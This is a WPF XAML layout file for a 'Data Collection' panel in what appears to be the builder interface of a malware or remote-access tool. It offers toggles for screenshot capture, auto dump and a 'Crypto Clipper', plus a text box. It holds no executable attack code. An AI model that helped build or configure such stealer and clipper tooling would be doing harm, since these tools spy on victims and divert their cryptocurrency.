Server/UI/CustomControls/BuilderControls/DcUC.xaml

<UserControl x:Class="Server.UI.CustomControls.BuilderControls.DcUC"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             xmlns:local="clr-namespace:Server.UI.CustomControls.BuilderControls"
             mc:Ignorable="d" FontSize="15" Foreground="{StaticResource Text}">
    <Border Background="#202020" CornerRadius="10" HorizontalAlignment="Center" VerticalAlignment="Center">
        <Grid>
            <Grid.RowDefinitions>
                <RowDefinition Height="64"/>
                <RowDefinition Height="*"/>
            </Grid.RowDefinitions>

            <Border BorderThickness="0,0,0,2" BorderBrush="#272727">
                <Grid>
                    <Button Background="Transparent" BorderThickness="0" Margin="0,10,10,0" Cursor="Hand" Width="21" Height="21" VerticalAlignment="Top" HorizontalAlignment="Right">
                        <Button.Content>
                            <Image Source="/UI/Assets/Icons/BuilderInfoIcon.png" Stretch="Uniform"/>
                        </Button.Content>
                    </Button>
                    <StackPanel Orientation="Horizontal" Grid.Row="0" HorizontalAlignment="Center" VerticalAlignment="Center">
                        <Image Width="24" Height="24" Margin="0,0,5,0" Source="/UI/Assets/Icons/BuilderOneIcon.png" VerticalAlignment="Center" />
                        <TextBlock Text="Data Collection" Foreground="White" FontSize="17" FontWeight="Medium" VerticalAlignment="Center"/>
                    </StackPanel>
                </Grid>
            </Border>


            <Border Padding="0,0,0,30" Grid.Row="1">
                <Grid Margin="30,0,30,0">
                    <Grid.RowDefinitions>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="18"/>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="18"/>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="*"/>
                    </Grid.RowDefinitions>

                    <StackPanel Orientation="Horizontal" Grid.Row="1">
                        <StackPanel Orientation="Horizontal">
                            <TextBlock Text="Screenshot Capture" VerticalAlignment="Center" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" />
                        </StackPanel>

                        <StackPanel Orientation="Horizontal" Margin="16,0,0,0">
                            <TextBlock Text="Auto Dump" VerticalAlignment="Center" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" />
                        </StackPanel>
                    </StackPanel>
                    
                    <StackPanel Orientation="Horizontal" Grid.Row="3">
                        <TextBlock Text="Crypto Clipper" VerticalAlignment="Center" />
                        <ToggleButton Style="{StaticResource CheckboxToggle}" />
                    </StackPanel>
                    
                    <StackPanel Grid.Row="5">
                        <Border BorderThickness="2" BorderBrush="#272727" CornerRadius="3" Width="340" Height="100" >
                            <TextBox Style="{StaticResource Common_TextBox}" />
                        </Border>
                    </StackPanel>
                </Grid>
            </Border>
        </Grid>
    </Border>
</UserControl>